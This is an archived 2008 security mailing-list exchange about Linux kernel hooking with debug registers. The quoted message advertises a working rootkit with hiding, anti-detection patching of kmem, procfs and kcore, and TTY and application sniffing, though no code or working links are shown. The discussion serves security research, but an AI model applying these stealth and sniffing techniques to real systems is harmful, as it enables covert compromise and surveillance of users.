Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Bas Alberts (bas.albertsimmunityinc.com)
Date: Thu Sep 04 2008 - 11:59:21 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Just as a sidenote, I was unaware of Pierre's research paper until today
(not much up on the Italians :)). But his paper most definitely is a
goto reference for this general hooking approach. Even if it is in
Italian, it's pretty readable and well researched. Combined with the
Intel SDM the work presented becomes pretty straightforward.
I've added it to the references in the DR README, and feel that it
serves as an excellent reference for the general approach as far as
Linux debug register based kernel hooking specifics go.
To answer some questions I've been getting off-list:
- - Yes, SMP support will be added
- - Yes, X86_64 support will be added
- - Yes, Proper GD support will be added
The initial implementation was written on the spot and in the span of a
week. Because the engine is used in the CANVAS rootkit it will receive
continuous support and updates. Feel free to submit feature requests.
Senior Security Researcher
Pierre Falda wrote:
> Hi people,
> if someone else is still interested in these things and wants to see an
> 'old' code, in 2006 i have published an article and a 2.4.x/2.6.x (tested
> until .19) linux rootkit
> which loads itself through kmem and fully implements these techniques. It's
> a full working rootkit with a debug registers engine and with
> anti detection checks via GD and CPU emulation to protect itself too. It has
> all modern rootkits hiding features, anti detection extra features
> like kmem/mem/kcore/procfs on the fly patching and most add-ons like TTY and
> applications sniffing. It works watching SCT and supports
> syscall invocations through int 80 and sysenter and so on.
> You can find the source code here:
> or here
> The article about the hardware engine (in Italian) is here
> and if you want the printed version in a scientific publication you can go
> Have a nice day!
> Pierre Falda 'darkangel'
> Antifork Research Inc.
> Dailydave mailing list
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
-----END PGP SIGNATURE-----
Dailydave mailing list